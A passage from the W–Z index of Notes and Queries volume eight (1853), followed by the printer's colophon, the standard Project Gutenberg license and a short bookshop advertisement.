- 63. —— Roden's colt, 340. —— tavern signs, 242. —— "Trail through the leaden sky," 494. —— variety is pleasing, 490. —— weather superstitions, 512. —— yew-tree in churchyards, 244. —— Zincali dictionary, 517. Warden (J. S.) on Captain Cook's discovery of the Sandwich Islands, 6. —— Coleridge's Christabel, 11. —— Creole, its meaning, 138. —— Goldsmith's Haunch of Venison, 640. —— Hoveden, Riley's translation, errors in, 637. —— letter "h" in humble, 54. —— literary parallels, 30. —— Man with the iron mask, 112. —— nightingale's song, 112. —— Reformed faith, 135. —— sheer hulk, 126. —— Sir Isaac Newton, 102. —— Sir Walter Raleigh, 78. —— St. Dominic, 136. Wardhouse, fishermen's custom there, 78. 281. 400. Warmistre (Miss), maid of honour, 461-463. * Warville, Brissot de, derivation of, 516. Warwick (Eden) on anticipatory use of the cross, 132. 546. —— gloves at fairs, 601. —— nursery rhymes, 605. —— swan marks, 256. * Warwick (Sir Philip) noticed, 268. * Washington (Gen.), anecdotes wanted, 125. Watch-paper inscriptions, 316. 375. Waterloo, poems in connexion with, 549. Watson (Bp.), quotation by him, 587. Watts (W. T.) on an inscription in a belfry, 561. Waugh, Bishop of Carlisle, his family arms, 271. 400. 525.
- 64. Way (Albert) on Caen tiles, 547. —— Lord Montague's Household Book, 540. W. (B. B.) on Sir John Daniel and Sir A. N. Salter, 318. W. (C. M.) on apparition of the White Lady, 317. W. (C. S.) on ash-trees attracting lightning, 493. —— Burton's death, 495. —— the queen at chess, 469. W. (E.) on marriage service, 150. Weather proverbs, 218. 326. —— rhymes, 512. —— rules, 50. 535. —— superstitions, 512. * Webb and Walker families, 386. * Webb of Monckton Farleigh, 563. Webb (Susannah), her burial and disinterment, 43. Weber's Cecilia, 589. Wedding divination, 455. * Weights and measures, standard in different countries, 340. Weir (Arch.) on St. Luke and Juvenal, 195. Wellesley, derivation of, 173. 223. 255. Wellington, the Duke's first victory, 491. —— curious coincidence respecting, 619. "Well's a fret," its meaning, 197. 258. 330. Wentworth (Sir Philip) noticed, 184. 251. Werenfrid (St.) and Butler's Lives, 342. West, praying to the, 102. 208. 343. 591. Westbury Court, inscription over the door, 129. * Westhumble Chapel, 410. Weston, "Going to Old Weston," 232. Weston (Edward), secretary to Lord Harrington, 103. 205. Weston (Valentine) on "That Swinney," 374. W. (F. B.) on Raffaelle's Sposalizio, 14. W. (G.) on derivation of Britain, 445. 651. —— Patrick's purgatory, 327. —— praying to the West, 208. —— tin, its early use, 291. 445.
- 65. —— veneration for the oak, 468. 632. W. (G. H.) on a title wanted, 151. W. (H.) on "giving quarter," 353. —— kicker-eating, 564. —— Luther no iconoclast, 477. —— "When the maggot bites," 353. Wharton (Dr. Henry) noticed, 167. Wheale, its meaning, 302. Whisperers, the seven, 436. Whiston, a passage in, 244. 397. 645. Whitborne (T. B.) on churchwardens, 584. —— Hoby Family, 244. —— lapwing and the vine, 127. —— Mrs. Tighe, author of Psyche, 103. —— Stillingfleet's library, 389. —— Thomas Blount, 286. 603. —— Warwickshire custom, 490. Whitchurch, parochial library at, 370. White (A. Holt) on Gilbert White of Selborne, 304. —— nugget, a thick bullock, 481. —— yew-trees in churchyards, 447. White (Blanco), sonnet by, 137. White (Gilbert), his portrait, 244. 304. White (John), folk lore in his "Way to the True Church," 613. * White bell heather transplanted, 79. * White Lady, apparition of the, 317. Whitelocke (Lieut.-Gen.) noticed, 521. 621. Whithamstede (John), abbot of St. Albans, 351. Whitmarsh (F.) on the Templars' jugs, 574. Wife, on selling one, 43. 209. Wilbraham's Cheshire collections, 270. 303. Wilde (G. J. de) on caves at Settle, 651. —— curious epitaph, 147. —— True Blue, 589. Wilde (W. R.) on the forlorn hope, 569. —— groaning elm-plank in Dublin, 397.
- 66. Wilkinson (H.) on stereoscopic angles, 181. * William the Conqueror, his mother, 564. * —— his surname, 197. * Williams' (Rev. Robert) Dictionary of the Cornish Language, 7. Williams (Samuel) the artist, 312. Willingham boy, 66. 305. Willison (Charles) on tavern signs, 627. Wills on Advent Hymn, 639. Wilson (Arthur C.) on London Labour and the London Poor, 620. Wilson (Bishop), his Sacra Privata, 470. —— and Cardinal Fleury, 245. * —— notices wanted, 220. * —— quotation from his Sacra Privata, 243. * Wilson (Samuel) noticed, 242. Windfall, its meaning, 14. Winds, their action, 338. Windsor Military Knights, 294. Wingfield Church, Suffolk, monuments in, 98. Wingfield (Sir Anthony), his portrait, 245. 299. 376. Winthrop (Wm.) on ambages, 232. —— American epitaph, 491. —— bells rung for the dead, 55. —— black as a mourning colour, 411. —— comet superstitions in 1853, 358. —— epitaph on an editor, 274. —— "Full moon brings fine weather," 79. —— house-marks, 231. —— injustice, its origin, 338. —— longevity, 113. 399. —— Maltese Knights, 99. 189. 557. —— "Mater ait natæ," &c., 160. —— punning divine, 586. —— "Putting your foot into it," 77. —— reversible names, 655. —— rulers of the world in 1853, 638. —— Spendthrift, a publication, 102.
- 67. —— "To pluck a crow with one," 197. —— weather rules, 535. —— Wolfe's army, the last survivor, 6. Winwood (Sir Ralph), notices of, 272. 519. Wishaw (Jas.) on Colchester records, 464. —— matriculations at inns of court, 650. Witchcraft, burning for, 470. * Withered hand, picture at Compton Park, 125. W. (J. K. B.) on Barthram's Dirge, 231. —— Blanco White, 137. —— Hogarth's picture, 294. W. (J. R.) on the Porter family, 526. Wmson (S.) on Byron's Childe Harold, 258. Wodderspoon (John) on Wingfield's portrait, 299. Wolfe (Gen.) at Nantwich, 587. —— last survivor of his army, 6. Wolsey (Cardinal), his arms, 233. 302. Woman, lines on, 292. 350. 423. Women and tortoises, 534. Women, their rights in the United States, 171. * Wood (George) of Chester, 34. Wooden tombs and effigies, 19. 255. 455. 604. Words, misunderstood, 120. —— small and low, 416. Wordsworth, on a passage in, 77. Worm in books, 412. 526. Worsaae (J. J. A.) on names of places, 58. Wotton (Henry Earl of) noticed, 173. 281. 563. Wren (Sir Christopher) and the Young Carver, 340. Wright (Robert) on shape of coffins, 256. Wright (Thomas) of Durham, 218. 326. Wt. (T.) on arms of See of York, 233. Wurm, in modern German, 624. W. (W.) Northamptonshire, on "Going to Old Weston," 232. —— Longfellow's Poetical Works, 267. W. (W. S.) on meaning of wheale, 302.
- 68. Wylcotes (Sir John), motto on his brass, 494. X. X. on binometrical verse, 655. XXX on brewers' casks, 439. 572. Y. Yarmouth, Great, seals of the borough, 269. 321. Y. (D.) on English clergyman in Spain, 410. Yeathers or Yadders, 148. 233. Yeowell (J.) on various editions of Butler's Lives, 387. —— Hemans' (Felicia) inedited lyric, 629. —— Jacob Böhme, or Behmen, 246. —— Mr. Pepys his queries, 341. —— Pope and Cowper, 383. —— Shield and arms at the Admiralty, 124. —— Wellington (the late Duke of), curious coincidence, 619. —— Wilbraham's Cheshire collections, 303. Yew-tree in churchyards, 244. 346. 447. York, the History of, its author, 125. 524. York see, its ancient arms, 34. 111. 233. 302. * Ypenstein, English refugees at, 562. Z. Z. (1) on Harmony of the Four Gospels, 551. Z. (4) on Harmony of the Four Gospels, 316. Z. (A.) on Dr. Harwood, 57. —— Green's Secret Plot, 79. —— Reynolds' nephew, 102. Zend Grammar, 491. Zeus on German tree, 619. Zincali, Dictionary of, 517.
- 69. Z. (Z. Z.) on motto, "Semper eadem," 440. END OF THE EIGHTH VOLUME. Printed by Thomas Clark Shaw, of No. 10. Stonefield Street, in the Parish of St. Mary, Islington, at No. 5. New Street Square, in the Parish of St. Bride, in the City of London; and published by George Bell, of No. 186. Fleet Street, in the Parish of St. Dunstan in the West, in the City of London, Publisher, at No. 186. Fleet Street aforesaid.
- 70. *** END OF THE PROJECT GUTENBERG EBOOK NOTES AND QUERIES, INDEX TO EIGHTH VOLUME, JULY-DECEMBER 1853 *** Updated editions will replace the previous one—the old editions will be renamed. Creating the works from print editions not protected by U.S. copyright law means that no one owns a United States copyright in these works, so the Foundation (and you!) can copy and distribute it in the United States without permission and without paying copyright royalties. Special rules, set forth in the General Terms of Use part of this license, apply to copying and distributing Project Gutenberg™ electronic works to protect the PROJECT GUTENBERG™ concept and trademark. Project Gutenberg is a registered trademark, and may not be used if you charge for an eBook, except by following the terms of the trademark license, including paying royalties for use of the Project Gutenberg trademark. If you do not charge anything for copies of this eBook, complying with the trademark license is very easy. You may use this eBook for nearly any purpose such as creation of derivative works, reports, performances and research. Project Gutenberg eBooks may be modified and printed and given away—you may do practically ANYTHING in the United States with eBooks not protected by U.S. copyright law. Redistribution is subject to the trademark license, especially commercial redistribution. START: FULL LICENSE
- 71. THE FULL PROJECT GUTENBERG LICENSE
- 72. PLEASE READ THIS BEFORE YOU DISTRIBUTE OR USE THIS WORK To protect the Project Gutenberg™ mission of promoting the free distribution of electronic works, by using or distributing this work (or any other work associated in any way with the phrase “Project Gutenberg”), you agree to comply with all the terms of the Full Project Gutenberg™ License available with this file or online at www.gutenberg.org/license. Section 1. General Terms of Use and Redistributing Project Gutenberg™ electronic works 1.A. By reading or using any part of this Project Gutenberg™ electronic work, you indicate that you have read, understand, agree to and accept all the terms of this license and intellectual property (trademark/copyright) agreement. If you do not agree to abide by all the terms of this agreement, you must cease using and return or destroy all copies of Project Gutenberg™ electronic works in your possession. If you paid a fee for obtaining a copy of or access to a Project Gutenberg™ electronic work and you do not agree to be bound by the terms of this agreement, you may obtain a refund from the person or entity to whom you paid the fee as set forth in paragraph 1.E.8. 1.B. “Project Gutenberg” is a registered trademark. It may only be used on or associated in any way with an electronic work by people who agree to be bound by the terms of this agreement. There are a few things that you can do with most Project Gutenberg™ electronic works even without complying with the full terms of this agreement. See paragraph 1.C below. There are a lot of things you can do with Project Gutenberg™ electronic works if you follow the terms of this agreement and help preserve free future access to Project Gutenberg™ electronic works. See paragraph 1.E below.
- 73. 1.C. The Project Gutenberg Literary Archive Foundation (“the Foundation” or PGLAF), owns a compilation copyright in the collection of Project Gutenberg™ electronic works. Nearly all the individual works in the collection are in the public domain in the United States. If an individual work is unprotected by copyright law in the United States and you are located in the United States, we do not claim a right to prevent you from copying, distributing, performing, displaying or creating derivative works based on the work as long as all references to Project Gutenberg are removed. Of course, we hope that you will support the Project Gutenberg™ mission of promoting free access to electronic works by freely sharing Project Gutenberg™ works in compliance with the terms of this agreement for keeping the Project Gutenberg™ name associated with the work. You can easily comply with the terms of this agreement by keeping this work in the same format with its attached full Project Gutenberg™ License when you share it without charge with others. 1.D. The copyright laws of the place where you are located also govern what you can do with this work. Copyright laws in most countries are in a constant state of change. If you are outside the United States, check the laws of your country in addition to the terms of this agreement before downloading, copying, displaying, performing, distributing or creating derivative works based on this work or any other Project Gutenberg™ work. The Foundation makes no representations concerning the copyright status of any work in any country other than the United States. 1.E. Unless you have removed all references to Project Gutenberg: 1.E.1. The following sentence, with active links to, or other immediate access to, the full Project Gutenberg™ License must appear prominently whenever any copy of a Project Gutenberg™ work (any work on which the phrase “Project
- 74. Gutenberg” appears, or with which the phrase “Project Gutenberg” is associated) is accessed, displayed, performed, viewed, copied or distributed: This eBook is for the use of anyone anywhere in the United States and most other parts of the world at no cost and with almost no restrictions whatsoever. You may copy it, give it away or re-use it under the terms of the Project Gutenberg License included with this eBook or online at www.gutenberg.org. If you are not located in the United States, you will have to check the laws of the country where you are located before using this eBook. 1.E.2. If an individual Project Gutenberg™ electronic work is derived from texts not protected by U.S. copyright law (does not contain a notice indicating that it is posted with permission of the copyright holder), the work can be copied and distributed to anyone in the United States without paying any fees or charges. If you are redistributing or providing access to a work with the phrase “Project Gutenberg” associated with or appearing on the work, you must comply either with the requirements of paragraphs 1.E.1 through 1.E.7 or obtain permission for the use of the work and the Project Gutenberg™ trademark as set forth in paragraphs 1.E.8 or 1.E.9. 1.E.3. If an individual Project Gutenberg™ electronic work is posted with the permission of the copyright holder, your use and distribution must comply with both paragraphs 1.E.1 through 1.E.7 and any additional terms imposed by the copyright holder. Additional terms will be linked to the Project Gutenberg™ License for all works posted with the permission of the copyright holder found at the beginning of this work. 1.E.4. Do not unlink or detach or remove the full Project Gutenberg™ License terms from this work, or any files
- 75. containing a part of this work or any other work associated with Project Gutenberg™. 1.E.5. Do not copy, display, perform, distribute or redistribute this electronic work, or any part of this electronic work, without prominently displaying the sentence set forth in paragraph 1.E.1 with active links or immediate access to the full terms of the Project Gutenberg™ License. 1.E.6. You may convert to and distribute this work in any binary, compressed, marked up, nonproprietary or proprietary form, including any word processing or hypertext form. However, if you provide access to or distribute copies of a Project Gutenberg™ work in a format other than “Plain Vanilla ASCII” or other format used in the official version posted on the official Project Gutenberg™ website (www.gutenberg.org), you must, at no additional cost, fee or expense to the user, provide a copy, a means of exporting a copy, or a means of obtaining a copy upon request, of the work in its original “Plain Vanilla ASCII” or other form. Any alternate format must include the full Project Gutenberg™ License as specified in paragraph 1.E.1. 1.E.7. Do not charge a fee for access to, viewing, displaying, performing, copying or distributing any Project Gutenberg™ works unless you comply with paragraph 1.E.8 or 1.E.9. 1.E.8. You may charge a reasonable fee for copies of or providing access to or distributing Project Gutenberg™ electronic works provided that: • You pay a royalty fee of 20% of the gross profits you derive from the use of Project Gutenberg™ works calculated using the method you already use to calculate your applicable taxes. The fee is owed to the owner of the Project Gutenberg™ trademark, but he has agreed to donate royalties under this paragraph to the Project Gutenberg Literary Archive Foundation. Royalty
- 76. payments must be paid within 60 days following each date on which you prepare (or are legally required to prepare) your periodic tax returns. Royalty payments should be clearly marked as such and sent to the Project Gutenberg Literary Archive Foundation at the address specified in Section 4, “Information about donations to the Project Gutenberg Literary Archive Foundation.” • You provide a full refund of any money paid by a user who notifies you in writing (or by e-mail) within 30 days of receipt that s/he does not agree to the terms of the full Project Gutenberg™ License. You must require such a user to return or destroy all copies of the works possessed in a physical medium and discontinue all use of and all access to other copies of Project Gutenberg™ works. • You provide, in accordance with paragraph 1.F.3, a full refund of any money paid for a work or a replacement copy, if a defect in the electronic work is discovered and reported to you within 90 days of receipt of the work. • You comply with all other terms of this agreement for free distribution of Project Gutenberg™ works. 1.E.9. If you wish to charge a fee or distribute a Project Gutenberg™ electronic work or group of works on different terms than are set forth in this agreement, you must obtain permission in writing from the Project Gutenberg Literary Archive Foundation, the manager of the Project Gutenberg™ trademark. Contact the Foundation as set forth in Section 3 below. 1.F. 1.F.1. Project Gutenberg volunteers and employees expend considerable effort to identify, do copyright research on, transcribe and proofread works not protected by U.S. copyright
- 77. law in creating the Project Gutenberg™ collection. Despite these efforts, Project Gutenberg™ electronic works, and the medium on which they may be stored, may contain “Defects,” such as, but not limited to, incomplete, inaccurate or corrupt data, transcription errors, a copyright or other intellectual property infringement, a defective or damaged disk or other medium, a computer virus, or computer codes that damage or cannot be read by your equipment. 1.F.2. LIMITED WARRANTY, DISCLAIMER OF DAMAGES - Except for the “Right of Replacement or Refund” described in paragraph 1.F.3, the Project Gutenberg Literary Archive Foundation, the owner of the Project Gutenberg™ trademark, and any other party distributing a Project Gutenberg™ electronic work under this agreement, disclaim all liability to you for damages, costs and expenses, including legal fees. YOU AGREE THAT YOU HAVE NO REMEDIES FOR NEGLIGENCE, STRICT LIABILITY, BREACH OF WARRANTY OR BREACH OF CONTRACT EXCEPT THOSE PROVIDED IN PARAGRAPH 1.F.3. YOU AGREE THAT THE FOUNDATION, THE TRADEMARK OWNER, AND ANY DISTRIBUTOR UNDER THIS AGREEMENT WILL NOT BE LIABLE TO YOU FOR ACTUAL, DIRECT, INDIRECT, CONSEQUENTIAL, PUNITIVE OR INCIDENTAL DAMAGES EVEN IF YOU GIVE NOTICE OF THE POSSIBILITY OF SUCH DAMAGE. 1.F.3. LIMITED RIGHT OF REPLACEMENT OR REFUND - If you discover a defect in this electronic work within 90 days of receiving it, you can receive a refund of the money (if any) you paid for it by sending a written explanation to the person you received the work from. If you received the work on a physical medium, you must return the medium with your written explanation. The person or entity that provided you with the defective work may elect to provide a replacement copy in lieu of a refund. If you received the work electronically, the person or entity providing it to you may choose to give you a second opportunity to receive the work electronically in lieu of a refund.
- 78. If the second copy is also defective, you may demand a refund in writing without further opportunities to fix the problem. 1.F.4. Except for the limited right of replacement or refund set forth in paragraph 1.F.3, this work is provided to you ‘AS-IS’, WITH NO OTHER WARRANTIES OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO WARRANTIES OF MERCHANTABILITY OR FITNESS FOR ANY PURPOSE. 1.F.5. Some states do not allow disclaimers of certain implied warranties or the exclusion or limitation of certain types of damages. If any disclaimer or limitation set forth in this agreement violates the law of the state applicable to this agreement, the agreement shall be interpreted to make the maximum disclaimer or limitation permitted by the applicable state law. The invalidity or unenforceability of any provision of this agreement shall not void the remaining provisions. 1.F.6. INDEMNITY - You agree to indemnify and hold the Foundation, the trademark owner, any agent or employee of the Foundation, anyone providing copies of Project Gutenberg™ electronic works in accordance with this agreement, and any volunteers associated with the production, promotion and distribution of Project Gutenberg™ electronic works, harmless from all liability, costs and expenses, including legal fees, that arise directly or indirectly from any of the following which you do or cause to occur: (a) distribution of this or any Project Gutenberg™ work, (b) alteration, modification, or additions or deletions to any Project Gutenberg™ work, and (c) any Defect you cause. Section 2. Information about the Mission of Project Gutenberg™
- 79. Project Gutenberg™ is synonymous with the free distribution of electronic works in formats readable by the widest variety of computers including obsolete, old, middle-aged and new computers. It exists because of the efforts of hundreds of volunteers and donations from people in all walks of life. Volunteers and financial support to provide volunteers with the assistance they need are critical to reaching Project Gutenberg™’s goals and ensuring that the Project Gutenberg™ collection will remain freely available for generations to come. In 2001, the Project Gutenberg Literary Archive Foundation was created to provide a secure and permanent future for Project Gutenberg™ and future generations. To learn more about the Project Gutenberg Literary Archive Foundation and how your efforts and donations can help, see Sections 3 and 4 and the Foundation information page at www.gutenberg.org. Section 3. Information about the Project Gutenberg Literary Archive Foundation The Project Gutenberg Literary Archive Foundation is a non- profit 501(c)(3) educational corporation organized under the laws of the state of Mississippi and granted tax exempt status by the Internal Revenue Service. The Foundation’s EIN or federal tax identification number is 64-6221541. Contributions to the Project Gutenberg Literary Archive Foundation are tax deductible to the full extent permitted by U.S. federal laws and your state’s laws. The Foundation’s business office is located at 809 North 1500 West, Salt Lake City, UT 84116, (801) 596-1887. Email contact links and up to date contact information can be found at the Foundation’s website and official page at www.gutenberg.org/contact
- 80. Section 4. Information about Donations to the Project Gutenberg Literary Archive Foundation Project Gutenberg™ depends upon and cannot survive without widespread public support and donations to carry out its mission of increasing the number of public domain and licensed works that can be freely distributed in machine-readable form accessible by the widest array of equipment including outdated equipment. Many small donations ($1 to $5,000) are particularly important to maintaining tax exempt status with the IRS. The Foundation is committed to complying with the laws regulating charities and charitable donations in all 50 states of the United States. Compliance requirements are not uniform and it takes a considerable effort, much paperwork and many fees to meet and keep up with these requirements. We do not solicit donations in locations where we have not received written confirmation of compliance. To SEND DONATIONS or determine the status of compliance for any particular state visit www.gutenberg.org/donate. While we cannot and do not solicit contributions from states where we have not met the solicitation requirements, we know of no prohibition against accepting unsolicited donations from donors in such states who approach us with offers to donate. International donations are gratefully accepted, but we cannot make any statements concerning tax treatment of donations received from outside the United States. U.S. laws alone swamp our small staff. Please check the Project Gutenberg web pages for current donation methods and addresses. Donations are accepted in a number of other ways including checks, online payments and
- 81. credit card donations. To donate, please visit: www.gutenberg.org/donate. Section 5. General Information About Project Gutenberg™ electronic works Professor Michael S. Hart was the originator of the Project Gutenberg™ concept of a library of electronic works that could be freely shared with anyone. For forty years, he produced and distributed Project Gutenberg™ eBooks with only a loose network of volunteer support. Project Gutenberg™ eBooks are often created from several printed editions, all of which are confirmed as not protected by copyright in the U.S. unless a copyright notice is included. Thus, we do not necessarily keep eBooks in compliance with any particular paper edition. Most people start at our website which has the main PG search facility: www.gutenberg.org. This website includes information about Project Gutenberg™, including how to make donations to the Project Gutenberg Literary Archive Foundation, how to help produce our new eBooks, and how to subscribe to our email newsletter to hear about new eBooks.
- 82. Welcome to our website – the perfect destination for book lovers and knowledge seekers. We believe that every book holds a new world, offering opportunities for learning, discovery, and personal growth. That’s why we are dedicated to bringing you a diverse collection of books, ranging from classic literature and specialized publications to self-development guides and children's books. More than just a book-buying platform, we strive to be a bridge connecting you with timeless cultural and intellectual values. With an elegant, user-friendly interface and a smart search system, you can quickly find the books that best suit your interests. Additionally, our special promotions and home delivery services help you save time and fully enjoy the joy of reading. Join us on a journey of knowledge exploration, passion nurturing, and personal growth every day! ebookbell.com